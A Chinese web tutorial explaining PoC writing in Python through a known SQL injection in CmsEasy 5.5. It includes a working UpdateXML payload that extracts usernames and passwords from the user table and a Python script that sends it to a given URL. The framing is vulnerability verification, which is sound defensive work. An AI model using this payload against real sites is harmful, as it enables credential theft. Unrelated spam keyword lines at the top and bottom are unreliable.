91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

python中poc指的是什么意思

發布時間:2020-11-21 13:46:41 來源:億速云 閱讀:725 作者:小新 欄目:編程語言

小編給大家分享一下python中poc指的是什么意思,希望大家閱讀完這篇文章后大所收獲,下面讓我們一起去探討吧!

0x00 我們需要掌握的幾個的概念

PoC(全稱:Proof of Concept)中文意思是“觀點證明”。在安全行業中PoC則是一段驗證漏洞的程序,使我們能夠確認這個漏洞是真實存在的。

Python,是一種面向對象、解釋型計算機程序設計語言。常見的一些庫我們需要了解,比如:urllib,urllib2,re,request,socket等,本文我們要使用Python這門語言,Python的基礎知識我們不做講解。

SQL Injection,通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令。

0x01 PoC編寫流程

場景還原:某網站托管公司,旗下托管了數萬個站點,負責這些站點的安全,但是突然某一天,某知名CMS程序被爆出存在一個高危的SQL注入,某網管排查后發現旗下托管網站中存在幾百個站點使用該CMS程序,那么一個一個去排查是否存在該漏洞是非常繁瑣的,所以,我們需要一個PoC來驗證下。

·根據該漏洞詳情的描述,假設已知出現漏洞的CMS版本號為4.1,可以去其官網或者GitHub上去下載相對應的版本。

·下載之后,模擬其服務器真實環境,本地進行搭建。根據漏洞描述,進行復現,已SQL注入為例,重復提交不同的參數,觀察不同的返回結果,同時注意如果該漏洞不存在出現的結果。

·根據漏洞復現的實際情況,進行PoC的編寫。

·PoC寫完之后需要進行相關的測試,已確保該PoC的編寫沒有問題,比如測試靶機程序,以及不存在漏洞的程序。

0x02 SQL Injection poc編寫

已知CmsEasy 5.5 UTF-8程序存在SQL注入,烏云漏洞中的漏洞細節比較詳細

(由于wooyun已經暫停訪問,故不上鏈接了)。

·首先,我們需要下載其相關源碼,進行本地搭建。

閱讀漏洞細節,我們得知其url與payload如下:

URL:http://xxx.xxx/celive/live/header.php Payload:xajax=LiveMessage&xajaxargs[0]=name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20

·漏洞復現:我們根據其漏洞描述,進行復現,該注入點需要發起一個Post請求,我們使用Firefox瀏覽器配合hackbar插件進行復現,填入url與payload,發送,獲取其賬戶密碼。

漏洞效果如下:

python中poc指的是什么意思這樣,我們的漏洞就已經復現成功了。接下來,我們來寫Poc。

#!/usr/bin/env python
# coding:utf-8
import urllib2
import urllib
import re
import sys
def verify(url):
target = '%s/celive/live/header.php' % url
#需要發送的數據
post_data = {
'xajax': 'LiveMessage',
'xajaxargs[0]': "name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- " }
try:
#發送請求
req = urllib2.Request(target, data=urllib.urlencode(post_data))
response = urllib2.urlopen(req)
#處理請求,進行判斷
if response:
data = response.read()
if "XPATH syntax error" in data:
print "%s is vulnerable" % target
else:
print "%s is not vulnerable" % target

except Exception, e:
print "Something happend..."
print e
def main():
args = sys.argv
url = ""
if len(args) == 2:
url = args[1]
verify(url)
else:
print "Usage: python %s url" % (args[0])
if __name__ == '__main__':
main()

看完了這篇文章,相信你對python中poc指的是什么意思有了一定的了解,想了解更多相關知識,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

翁牛特旗| 榆林市| 南雄市| 闻喜县| 青岛市| 三明市| 库伦旗| 澎湖县| 金寨县| 库车县| 卫辉市| 巩留县| 新干县| 康定县| 介休市| 齐河县| 芒康县| 紫阳县| 武乡县| 奈曼旗| 突泉县| 汽车| 中超| 巍山| 财经| 麻阳| 宜宾县| 个旧市| 会泽县| 平江县| 德格县| 句容市| 图木舒克市| 独山县| 肇源县| 高密市| 孟津县| 科技| 会同县| 肃南| 乐安县|